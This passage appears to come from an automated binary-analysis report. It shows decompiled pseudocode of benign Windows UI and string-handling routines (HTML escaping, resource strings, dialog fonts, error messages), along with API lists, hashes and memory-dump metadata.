                                                                                                                                                                    										_push(_t7);
                                                                                                                                                                    										_push(L"<br>");
                                                                                                                                                                    										goto L14;
                                                                                                                                                                    									}
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_push(0xa);
                                                                                                                                                                    									_push(L"&amp;");
                                                                                                                                                                    									goto L11;
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_push(0xa);
                                                                                                                                                                    								_push(L"&deg;");
                                                                                                                                                                    								L11:
                                                                                                                                                                    								_t2 = memcpy(_t8, ??, ??);
                                                                                                                                                                    								_t10 = _t10 + 0xc;
                                                                                                                                                                    								_t8 = _t8 + 0xa;
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                                                                                                    							_t10 = _t10 + 0xc;
                                                                                                                                                                    							_t8 = _t8 + 0xc;
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_push(_t7);
                                                                                                                                                                    						_push(L"&gt;");
                                                                                                                                                                    						goto L14;
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L16;
                                                                                                                                                                    				}
                                                                                                                                                                    			}








                                                                                                                                                                    0x0040dc26
                                                                                                                                                                    0x0040dc26
                                                                                                                                                                    0x0040dc28
                                                                                                                                                                    0x0040dc3c
                                                                                                                                                                    0x0040dc3d
                                                                                                                                                                    0x0040dc42
                                                                                                                                                                    0x0040dc45
                                                                                                                                                                    0x0040dc45
                                                                                                                                                                    0x0040dc09
                                                                                                                                                                    0x0040dc11
                                                                                                                                                                    0x0040dc16
                                                                                                                                                                    0x0040dc19
                                                                                                                                                                    0x0040dc19
                                                                                                                                                                    0x0040dbfb
                                                                                                                                                                    0x0040dbfb
                                                                                                                                                                    0x0040dbfc
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040dbfc
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040dbf9

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                    • Opcode ID: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
                                                                                                                                                                    • Instruction ID: 0c92722b5564fee70601bedc3038ef5bb71485c7004a8157c6d80a0c5a0d985f
                                                                                                                                                                    • Opcode Fuzzy Hash: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
                                                                                                                                                                    • Instruction Fuzzy Hash: E001C0A2E6826061FA3021968C86FBA15549BA2B10FA0013BB986352C6D1FD09CFC15F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                                    			E00406827(signed short __ebx) {
                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                    				void* _t22;
                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                    				struct HINSTANCE__* _t25;
                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                    				signed int _t30;
                                                                                                                                                                    				signed int _t31;
                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                    				void* _t35;
                                                                                                                                                                    				signed short _t39;
                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                    				intOrPtr _t52;
                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                    				void* _t57;
                                                                                                                                                                    				int _t61;
                                                                                                                                                                    				void* _t62;
                                                                                                                                                                    				int _t71;
                                                                                                                                                                    				void* _t72;
                                                                                                                                                                    				void* _t73;
                                                                                                                                                                    
                                                                                                                                                                    				_t39 = __ebx;
                                                                                                                                                                    				if( *0x413288 == 0) {
                                                                                                                                                                    					E00406785();
                                                                                                                                                                    				}
                                                                                                                                                                    				_t40 =  *0x413280; // 0x18
                                                                                                                                                                    				_t21 = 0;
                                                                                                                                                                    				if(_t40 <= 0) {
                                                                                                                                                                    					L5:
                                                                                                                                                                    					_t57 = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					while(1) {
                                                                                                                                                                    						_t55 =  *0x413278; // 0x8c70a0
                                                                                                                                                                    						if(_t39 ==  *((intOrPtr*)(_t55 + _t21 * 4))) {
                                                                                                                                                                    							break;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t21 = _t21 + 1;
                                                                                                                                                                    						if(_t21 < _t40) {
                                                                                                                                                                    							continue;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							goto L5;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L6;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t52 =  *0x41327c; // 0x8c74a8
                                                                                                                                                                    					_t53 =  *0x413270; // 0x2080048
                                                                                                                                                                    					_t57 = _t53 +  *(_t52 + _t21 * 4) * 2;
                                                                                                                                                                    				}
                                                                                                                                                                    				L6:
                                                                                                                                                                    				if(_t57 != 0) {
                                                                                                                                                                    					L21:
                                                                                                                                                                    					_t22 = _t57;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					if((_t39 & 0x00010000) == 0) {
                                                                                                                                                                    						if( *0x412c38 == 0) {
                                                                                                                                                                    							_t23 =  *0x413290; // 0x1000
                                                                                                                                                                    							_push(_t23 - 1);
                                                                                                                                                                    							_push( *0x413274);
                                                                                                                                                                    							_push(_t39);
                                                                                                                                                                    							_t25 = E0040698D();
                                                                                                                                                                    							goto L15;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							wcscpy(0x412e48, L"strings");
                                                                                                                                                                    							_t35 = E00406D16(_t39,  *0x413274);
                                                                                                                                                                    							_t62 = _t62 + 0x10;
                                                                                                                                                                    							if(_t35 == 0) {
                                                                                                                                                                    								L13:
                                                                                                                                                                    								_t25 = GetModuleHandleW(0);
                                                                                                                                                                    								_t46 =  *0x413290; // 0x1000
                                                                                                                                                                    								_push(_t46 - 1);
                                                                                                                                                                    								_push( *0x413274);
                                                                                                                                                                    								_push(_t39);
                                                                                                                                                                    								goto L15;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t61 = wcslen( *0x413274);
                                                                                                                                                                    								if(_t61 == 0) {
                                                                                                                                                                    									goto L13;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t25 = GetModuleHandleW(_t57);
                                                                                                                                                                    						_t49 =  *0x413290; // 0x1000
                                                                                                                                                                    						_push(_t49 - 1);
                                                                                                                                                                    						_push( *0x413274);
                                                                                                                                                                    						_push(_t39 & 0x0000ffff);
                                                                                                                                                                    						L15:
                                                                                                                                                                    						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                                                                                                                    						_t71 = _t61;
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_t71 <= 0) {
                                                                                                                                                                    						L20:
                                                                                                                                                                    						_t22 = 0x40f454;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t27 =  *0x413284; // 0xcd
                                                                                                                                                                    						_t10 = _t61 + 2; // 0xcf
                                                                                                                                                                    						_t72 = _t27 + _t10 -  *0x413288; // 0x8000
                                                                                                                                                                    						if(_t72 >= 0) {
                                                                                                                                                                    							goto L20;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t42 =  *0x413280; // 0x18
                                                                                                                                                                    							_t73 = _t42 -  *0x41328c; // 0x100
                                                                                                                                                                    							if(_t73 >= 0) {
                                                                                                                                                                    								goto L20;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t43 =  *0x413270; // 0x2080048
                                                                                                                                                                    								_t57 = _t43 + _t27 * 2;
                                                                                                                                                                    								_t14 = _t61 + 2; // 0x2
                                                                                                                                                                    								memcpy(_t57,  *0x413274, _t61 + _t14);
                                                                                                                                                                    								_t30 =  *0x413280; // 0x18
                                                                                                                                                                    								_t44 =  *0x413284; // 0xcd
                                                                                                                                                                    								_t54 =  *0x41327c; // 0x8c74a8
                                                                                                                                                                    								 *(_t54 + _t30 * 4) = _t44;
                                                                                                                                                                    								_t31 =  *0x413280; // 0x18
                                                                                                                                                                    								_t45 =  *0x413278; // 0x8c70a0
                                                                                                                                                                    								 *(_t45 + _t31 * 4) = _t39;
                                                                                                                                                                    								_t32 =  *0x413284; // 0xcd
                                                                                                                                                                    								 *0x413280 =  *0x413280 + 1;
                                                                                                                                                                    								 *0x413284 = _t32 + _t61 + 1;
                                                                                                                                                                    								if(_t57 != 0) {
                                                                                                                                                                    									goto L21;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									goto L20;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t22;
                                                                                                                                                                    			}































                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                                    • wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                                      • Part of subcall function 00406D16: memset.MSVCRT ref: 00406D29
                                                                                                                                                                      • Part of subcall function 00406D16: _itow.MSVCRT ref: 00406D37
                                                                                                                                                                    • wcslen.MSVCRT ref: 004068C6
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                                    • LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040693F
                                                                                                                                                                      • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067BF
                                                                                                                                                                      • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067DD
                                                                                                                                                                      • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067FB
                                                                                                                                                                      • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 00406819
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                    • String ID: strings
                                                                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                                                                    • Opcode ID: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
                                                                                                                                                                    • Instruction ID: b83127d2a15bee255c74f42c5a27ad94469461630f4946f0f4b43b8e5d041769
                                                                                                                                                                    • Opcode Fuzzy Hash: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
                                                                                                                                                                    • Instruction Fuzzy Hash: 1641B375200102AFDB14FF18ED849B673A1F754306711C1FEE806B76A1DB7AAA22CB5C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                    			E00406050(short* __ebx, intOrPtr _a4) {
                                                                                                                                                                    				int _v8;
                                                                                                                                                                    				char _v12;
                                                                                                                                                                    				void _v2058;
                                                                                                                                                                    				void _v2060;
                                                                                                                                                                    				int _t35;
                                                                                                                                                                    				int _t41;
                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                    				signed short* _t50;
                                                                                                                                                                    				void** _t52;
                                                                                                                                                                    				void* _t53;
                                                                                                                                                                    				void* _t54;
                                                                                                                                                                    
                                                                                                                                                                    				_t48 = 0;
                                                                                                                                                                    				_v2060 = 0;
                                                                                                                                                                    				memset( &_v2058, 0, 0x7fe);
                                                                                                                                                                    				_t54 = _t53 + 0xc;
                                                                                                                                                                    				 *__ebx = 0;
                                                                                                                                                                    				_t52 = _a4 + 4;
                                                                                                                                                                    				_v12 = 8;
                                                                                                                                                                    				do {
                                                                                                                                                                    					_push( *_t52);
                                                                                                                                                                    					_push( *((intOrPtr*)(_t52 - 4)));
                                                                                                                                                                    					_push(L"%s (%s)");
                                                                                                                                                                    					_push(0x400);
                                                                                                                                                                    					_push( &_v2060);
                                                                                                                                                                    					L0040DFD6();
                                                                                                                                                                    					_t35 = wcslen( &_v2060);
                                                                                                                                                                    					_v8 = _t35;
                                                                                                                                                                    					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                                                                                                                    					_t49 = _t48 + _v8 + 1;
                                                                                                                                                                    					_t41 = wcslen( *_t52);
                                                                                                                                                                    					_v8 = _t41;
                                                                                                                                                                    					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                                                                                                                    					_t54 = _t54 + 0x34;
                                                                                                                                                                    					_t52 =  &(_t52[2]);
                                                                                                                                                                    					_t23 =  &_v12;
                                                                                                                                                                    					 *_t23 = _v12 - 1;
                                                                                                                                                                    					_t48 = _t49 + _v8 + 1;
                                                                                                                                                                    				} while ( *_t23 != 0);
                                                                                                                                                                    				_t50 = __ebx + _t48 * 2;
                                                                                                                                                                    				 *_t50 =  *_t50 & 0x00000000;
                                                                                                                                                                    				_t50[1] = _t50[1] & 0x00000000;
                                                                                                                                                                    				return __ebx;
                                                                                                                                                                    			}
















                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
• Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
• Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
• Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                                    • API String ID: 3979103747-1363028141
                                                                                                                                                                    • Opcode ID: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
                                                                                                                                                                    • Instruction ID: f719391f3769af673f645ccb22e5d53aea3ed69308020c87343d88254f0aea6b
                                                                                                                                                                    • Opcode Fuzzy Hash: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
                                                                                                                                                                    • Instruction Fuzzy Hash: 27119072800119EBCF20DF95CC45ECAB7F9FF00308F1144BAE944B7152EBB5A6588B94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                    			E00406F88(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                                    				void _v514;
                                                                                                                                                                    				short _v516;
                                                                                                                                                                    				void _v8710;
                                                                                                                                                                    				short _v8712;
                                                                                                                                                                    				int _t17;
                                                                                                                                                                    				WCHAR* _t26;
                                                                                                                                                                    
                                                                                                                                                                    				E0040E340(0x2204, __ecx);
                                                                                                                                                                    				_v8712 = 0;
                                                                                                                                                                    				memset( &_v8710, 0, 0x2000);
                                                                                                                                                                    				_t17 = GetDlgCtrlID(_a4);
                                                                                                                                                                    				_t34 = _t17;
                                                                                                                                                                    				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                                                                                                                    				if(_t17 > 0 && _v8712 != 0) {
                                                                                                                                                                    					_v516 = 0;
                                                                                                                                                                    					memset( &_v514, 0, 0x1fe);
                                                                                                                                                                    					GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                                                                                    					_t26 =  &_v516;
                                                                                                                                                                    					_push(L"sysdatetimepick32");
                                                                                                                                                                    					_push(_t26);
                                                                                                                                                                    					L0040E03E();
                                                                                                                                                                    					if(_t26 != 0) {
                                                                                                                                                                    						E00406E5E(_t34,  &_v8712);
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return 1;
                                                                                                                                                                    			}










                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
• Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
• Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
• Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                                                                    • Opcode ID: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
                                                                                                                                                                    • Instruction ID: 57a1b33134393eb8e1d887e85ad6c32cde466d51f9494c9a374c65f7fd7f5279
                                                                                                                                                                    • Opcode Fuzzy Hash: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
                                                                                                                                                                    • Instruction Fuzzy Hash: 0C11A7329042197ADB24EF91DD49A9B7B7CEF04750F0040BAF508E2091E7755A55CB99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                    			E004052B3(long __edi, wchar_t* _a4) {
                                                                                                                                                                    				short _v8;
                                                                                                                                                                    				void* _t8;
                                                                                                                                                                    				void* _t10;
                                                                                                                                                                    				long _t14;
                                                                                                                                                                    				long _t24;
                                                                                                                                                                    
                                                                                                                                                                    				_t24 = __edi;
                                                                                                                                                                    				_t8 = 0;
                                                                                                                                                                    				_t14 = 0x1100;
                                                                                                                                                                    				if(__edi - 0x834 <= 0x383) {
                                                                                                                                                                    					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                                                                                                                    					if(0 != 0) {
                                                                                                                                                                    						_t14 = 0x1900;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                                                                                                    					_t10 = wcscpy(_a4, 0x40f454);
                                                                                                                                                                    				} else {
                                                                                                                                                                    					if(wcslen(_v8) < 0x400) {
                                                                                                                                                                    						wcscpy(_a4, _v8);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t10 = LocalFree(_v8);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t10;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000,?,?,00000001), ref: 004052D8
                                                                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7), ref: 004052F6
                                                                                                                                                                    • wcslen.MSVCRT ref: 00405303
                                                                                                                                                                    • wcscpy.MSVCRT ref: 00405313
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000), ref: 0040531D
                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040532D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                    • String ID: netmsg.dll
                                                                                                                                                                    • API String ID: 2767993716-3706735626
                                                                                                                                                                    • Opcode ID: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
                                                                                                                                                                    • Instruction ID: 17948da3eb349c1f06e63398449681b55ea015706cd50f91573ee618f1a58307
                                                                                                                                                                    • Opcode Fuzzy Hash: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
                                                                                                                                                                    • Instruction Fuzzy Hash: 3101D431501114BAE7242791EC0AF9F7B68DF047A5B20043AF902B40D2DA756E10CA9C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                    			E0040103E(void* __esi, void* __eflags) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				struct tagLOGFONTW _v100;
                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                    				int _t21;
                                                                                                                                                                    				long _t22;
                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                    				struct HDC__* _t27;
                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                    
                                                                                                                                                                    				_t27 = GetDC(0);
                                                                                                                                                                    				_t14 = GetDeviceCaps(_t27, 0x5a);
                                                                                                                                                                    				_t25 = 0x60;
                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                    				_v8 = _t14 * 0xe / _t25;
                                                                                                                                                                    				ReleaseDC(0, _t27);
                                                                                                                                                                    				E00405833( &_v100, L"MS Sans Serif", _v8, 1);
                                                                                                                                                                    				_t21 = CreateFontIndirectW( &_v100);
                                                                                                                                                                    				 *(__esi + 0x43c) = _t21;
                                                                                                                                                                    				_t22 = SendDlgItemMessageW( *(__esi + 0x10), 0x3ec, 0x30, _t21, 0);
                                                                                                                                                                    				_t33 =  *0x412fd0; // 0x0
                                                                                                                                                                    				if(_t33 != 0) {
                                                                                                                                                                    					return SendDlgItemMessageW( *(__esi + 0x10), 0x3ee, 0x30,  *(__esi + 0x43c), 0);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t22;
                                                                                                                                                                    			}












                                                                                                                                                                    APIs
                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00401049
                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401054
                                                                                                                                                                    • ReleaseDC.USER32 ref: 00401068
                                                                                                                                                                      • Part of subcall function 00405833: memset.MSVCRT ref: 0040583D
                                                                                                                                                                      • Part of subcall function 00405833: wcscpy.MSVCRT ref: 0040587D
                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401087
                                                                                                                                                                    • SendDlgItemMessageW.USER32 ref: 004010A5
                                                                                                                                                                    • SendDlgItemMessageW.USER32 ref: 004010C1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ItemMessageSend$CapsCreateDeviceFontIndirectReleasememsetwcscpy
                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                    • API String ID: 1274520933-168460110
                                                                                                                                                                    • Opcode ID: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
                                                                                                                                                                    • Instruction ID: 76445cfa4d73c44bf9acfae61aa42174960e6aa773b684d89c5daaca756457af
                                                                                                                                                                    • Opcode Fuzzy Hash: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
                                                                                                                                                                    • Instruction Fuzzy Hash: 58019E71600308BBE7216BB0DD89F2B76BDF780700F000439F601F60D0D6B0AA188B68
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00403333(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t75;
                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                    				signed int _t91;
                                                                                                                                                                    				signed int _t92;
                                                                                                                                                                    				void* _t100;
                                                                                                                                                                    				void* _t104;
                                                                                                                                                                    				short* _t122;
                                                                                                                                                                    				unsigned int _t128;
                                                                                                                                                                    				intOrPtr _t131;
                                                                                                                                                                    				signed int _t134;
                                                                                                                                                                    				void* _t149;
                                                                                                                                                                    				void* _t150;
                                                                                                                                                                    				intOrPtr* _t151;
                                                                                                                                                                    				short _t157;
                                                                                                                                                                    				signed int _t158;
                                                                                                                                                                    
                                                                                                                                                                    				_t132 = __ecx;
                                                                                                                                                                    				_t75 = _a4 - 0x4e;
                                                                                                                                                                    				_t158 = __ecx;
                                                                                                                                                                    				if(_t75 == 0) {
                                                                                                                                                                    					_t151 = _a12;
                                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xfffffffd;
                                                                                                                                                                    					if( *((intOrPtr*)(_t151 + 8)) == 0xfffffffd) {
                                                                                                                                                                    						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                    							E00402D48(__eflags,  *_t151,  *(_t151 + 0xc));
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xffffff9b;
                                                                                                                                                                    					if( *((intOrPtr*)(_t151 + 8)) != 0xffffff9b) {
                                                                                                                                                                    						L27:
                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                    						return 0;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
                                                                                                                                                                    						if( *((intOrPtr*)(_t151 + 4)) != 0x3e9) {
                                                                                                                                                                    							goto L27;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t77 =  *(_t151 + 0x14);
                                                                                                                                                                    						__eflags = _t77 & 0x00000002;
                                                                                                                                                                    						if((_t77 & 0x00000002) == 0) {
                                                                                                                                                                    							L36:
                                                                                                                                                                    							_t134 =  *(_t151 + 0x18) ^ _t77;
                                                                                                                                                                    							__eflags = 0x0000f000 & _t134;
                                                                                                                                                                    							if((0x0000f000 & _t134) == 0) {
                                                                                                                                                                    								L39:
                                                                                                                                                                    								__eflags =  *(_t151 + 0x14) & 0x00000002;
                                                                                                                                                                    								if(( *(_t151 + 0x14) & 0x00000002) == 0) {
                                                                                                                                                                    									goto L27;
                                                                                                                                                                    								}
                                                                                                                                                                    								__eflags =  *(_t151 + 0x18) & 0x00000002;
                                                                                                                                                                    								if(( *(_t151 + 0x18) & 0x00000002) != 0) {
                                                                                                                                                                    									goto L27;
                                                                                                                                                                    								}
                                                                                                                                                                    								__eflags =  *(_t151 + 0xc);
                                                                                                                                                                    								E004013E1(_t158, 0x3eb, 0 |  *(_t151 + 0xc) != 0x00000000);
                                                                                                                                                                    								__eflags =  *(_t151 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 1;
                                                                                                                                                                    								E004013E1(_t158, 0x3ec, 0 |  *(_t151 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 0x00000001);
                                                                                                                                                                    								 *((intOrPtr*)(_t158 + 0x48)) = 1;
                                                                                                                                                                    								SetDlgItemInt( *(_t158 + 0x10), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) +  *(_t151 + 0x28) * 4), 0);
                                                                                                                                                                    								 *((intOrPtr*)(_t158 + 0x48)) = 0;
                                                                                                                                                                    								return 1;
                                                                                                                                                                    							}
                                                                                                                                                                    							L37:
